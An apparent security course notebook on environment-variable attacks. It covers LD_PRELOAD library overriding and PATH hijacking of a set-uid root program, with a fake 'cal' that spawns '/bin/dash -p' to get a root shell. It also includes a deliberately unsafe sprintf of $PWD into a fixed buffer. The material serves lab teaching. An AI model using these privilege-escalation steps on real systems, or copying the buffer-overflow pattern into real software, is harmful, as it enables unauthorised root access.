## <center> Attacks through Environment Variables

### What are environment variables?

- Consist of names that have values assigned to them. 
- Provide a way to influence the behaviour of software on the system.
- For example:
  - The PATH environment variable provides a semicolon-separated list of directories where executable programs are stored

### Working principles of environment variables

- Process locality: The values of EV are local. If two terminals/shells are opened, and we change a system EV in one of the shell, the other will not be impacted. 
- Inheritance: When a parent process creates a child process, the child process inherits all the EVs the parent process had.
- Case sensititivy: The names of EVs are case sensitive.

#### Exercise
- Open a new terminal
- Run 'printenv' to view all system EVs inside the SEED VM

### How do C programs access environment variables?

- Third argument provided to the `main()` function: `envp[]`, or
- Global variable `environ`

In [ ]:
%%writefile source/print_env.c
#include <stdio.h>
void main(int argc, char* argv[], char* envp[])
{
   int i = 0;
   while (envp[i] !=NULL) {
      printf("%s\n", envp[i++]);
   }
}

#### Exercise

- Compile and run the `print_env` program (see previous execution example from the set_uid lecture)

In [ ]:
%%writefile source/print_env_environ.c
#include <stdio.h>

extern char** environ;
void main(int argc, char* argv[], char* envp[])
{
   int i = 0;
   while (environ[i] != NULL) {
      printf("%s\n", environ[i++]);
   }
}

#### Exercise

- Compile and run the `print_env_environ` program (see previous execution example from the set_uid lecture)
- Is the printed list of EVs any different than the one printed by `print_env`?

### How the EVs are passed to a process?

- If this is a new process (created using `fork()`)
  - EV list is a duplicate of parent process
- If this is a new program inside an existing process (created using `execve()`)
  - EV list is overwritten with the new program's
  - Need to pass an EV list (existing EVs or new ones) to `execve()`
  - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/exec.c#l1376

In [ ]:
%%writefile source/run_execve.c
#include <stdio.h>

extern char ** environ;
void main(int argc, char* argv[], char* envp[])
{
  int i = 0; char* v[2]; char* newenv[3];
  if (argc < 2) return;

  // Construct the argument array
  v[0] = "/usr/bin/env";   v[1] = NULL;

  // Construct the environment variable array
  newenv[0] = "AAA=aaa"; newenv[1] = "BBB=bbb"; newenv[2] = NULL;

  switch(argv[1][0]) {
    case '1': // Passing no environment variable.
       execve(v[0], v, NULL);
    case '2': // Passing a new set of environment variables.
       execve(v[0], v, newenv);
    case '3': // Passing all the environment variables.
       execve(v[0], v, environ);
    default:
       execve(v[0], v, NULL);
  }
}

#### Exercise

- Save and compile `run_execve`
- Execute `run_execve` three times with the three input options

### Shell variables versus environment variables

- Are not the same thing
- Different but related concepts

- Recall from Introduction to Linux: Shell is a command line interface  for users to interact with an operating system (Linux)
- Shell variables are internal variables maintained by a shell program
- User can create, assign, and delete shell variables
- Environment variables can become shell variables and vice versa

When a shell program starts (a terminal is opened)
- The shell defines a shell variable for each environment variable of the process (the shell process)
- Same name, same value
- The shell can easily get the value of the environment variables by referring to its own shell variables

#### Exercise

```
$ cat /proc/$$environ
$ strings /proc/$$/environ | grep LOGNAME
$ echo $LOGNAME
$ LOGNAME=ram
$ echo $LOGNAME
$ strings /proc/$$/environ | grep LOGNAME
```

Shell variables affect the environment variable of child processes
- Technically, each (any) program is executed from inside a shell (from terminal)
- Two types of shell variables will be provided to the new program

<center> <img src="figure/environment-variables/ev2.png" width="400"/>

<center> <img src="figure/environment-variables/ev1.png" width="400"/>

### Attack surfaces caused by environment variables

<center> <img src="figure/environment-variables/ev3.png" width="400"/>

### Attacks via Dynamic Linkers and Libraries

#### Static and Dynamic Linking
- Linking finds the external library code referenced in the program and links the code to the program (think **import** in Java).
- Linking can be done:
  - When a program is compiled: static linking
  - At runtime: dynamic linking

In [ ]:
%%writefile source/hello.c
#include <stdio.h>
int main(){
  printf("Hello World!");
    return 0;
}

Run the followings in a terminal:

```
$ cd ~
$ gcc -o hello_dynamic Computer_Science/source/hello.c
$ gcc -static -o hello_static Computer_Science/source/hello.c
$ ls -l hello*
```

#### Static linking
- All static executables (binaries) carry all copies of external functions loaded in `#include`
- Waste of memory
- Compiled external functions are static, and will not be updated even if the system is updated.

#### Dynamic linking
- External functions are linked at runtime, called *shared libraries*
- **.so** on Unix system, **.dll** on Windows systems

<center> <img src="figure/environment-variables/ev4.png" width="600"/>

`ldd` can be used to see what shared libraries a program depends on:

```
$ ldd hello_static
$ ldd hello_dynamic
```

#### Vulnerabilies
- Part of what is being executed is undecided during compilation time, when the developer has full control
- Instead, the binaries rely on linked libraries, which are determined during runtime, under users' control
- Case Study: LD_PRELOAD and LD_LIBRARy_PATH

- During the linking stage, the Linux system search for library functions from default locations. 
- These locations are determined via LD_PRELOAD and LD_LIBRARY_PATH

```
$ echo $LD_PRELOAD
$ echo $LD_LIBRARY_PATH
```

#### Exercise

Run `man ld.so` and learn about the difference between `LD_PRELOAD` and `LD_LIBRARY_PATH`

In [ ]:
%%writefile source/linking.c
int main() {
    sleep(5);
    return 0;
}

Run the following in a terminal:

```
$ cd ~
$ gcc -o linking Computer-Science/source/linking.c
$ ./linking
```

In [ ]:
%%writefile source/sleep.c
#include <stdio.h>
void sleep() {
    printf("I am not sleeping! \n");
}

Let's compile the above code, create a shared library, and add this shared library to the `LD_PRELOAD` environment.

```
$ cd ~
$ gcc -c Computer-Security/source/sleep.c
$ gcc -shared -o libmylib.so.1.0.1 sleep.o
$ ls -l 
$ export LD_PRELOAD=./libmylib.so.1.0.1
$ echo $LD_PRELOAD
```

How does this impact our `linking.c` program?

```
$ ./linking
$ unset LD_PRELOAD
$ ./linking
```

This would be been a dangerous vulnerability, if linking has elevvated privilige via `set-uid`

Linux's system libraries, `ld.so` or `ld-linux.so`, implement a countermeasure, which ignores `LD_PRELOAD` and `LD_LIBRARY_PATH` when there is a difference in a process' real and effective user IDs or group IDs. 

#### Exercise
Demonstrate the countermeasure above by performing the following tasks:

- Make a copy of the `env` program in your home directory, called `myenv`
- Enable set-uid privilige on `myenv`
- Define new environment variable values for LD_PRELOAD and LD_LIBRARY_PATH
```
$ export LD_PRELOAD=./libmylib.so.1.0.1
$ export LD_LIBRARY_PATH=.
```
- Define new environment variable LD_MYOWN
```
$ export LD_MYOWN="my own EV"
```
- Run `env` and `myenv` with ` | grep LD_` parameter, and report the difference

### Attacks via External Program

- PATH environment variable (run `echo $PATH` to find out what yours is)
- Many system commands are placed in `/usr/bin` or `/bin`, which are mapped in $PATH

In [ ]:
%%writefile source/vul.c
#include <stdlib.h>
int main(){
    system("cal");
}

#### Exercise

- Compile `vul.c` into a binary file named `vul` in your home directory.
- What does `vul` produce?

In [ ]:
%%writefile source/cal.c
int main(){
    system("/bin/dash -p");
}

Run the followings:
    
```
$ sudo chown root vul
$ sudo chmod 4755 vul
$ gcc -o cal Computer-Science/source/cal.c
$ export PATH=.:$PATH
$ echo $PATH
$ vul
# id
```

### Attack via Application Code

This happens when application uses environment variables, which can be manipulated

In [ ]:
%%writefile source/pwd.c
#include <stdio.h>
#include <stdlib.h>

int main(void){
  char arr[64];
  char *ptr;
    
  ptr = getenv("PWD");
  if (ptr != NULL){
    sprintf(arr, "Present working directory is: %s", ptr);
    printf("%s", arr);
  }
}

Run the followings in a terminal

```
$ echo $PWD
$ gcc -o pwd Computer-Security/source/pwd.c
$ ./pwd
$ cd /
$ ./pwd
$ PWD=randomdir
$ ./pwd
```

<center> <img src="figure/environment-variables/ev5.png" width="600"/>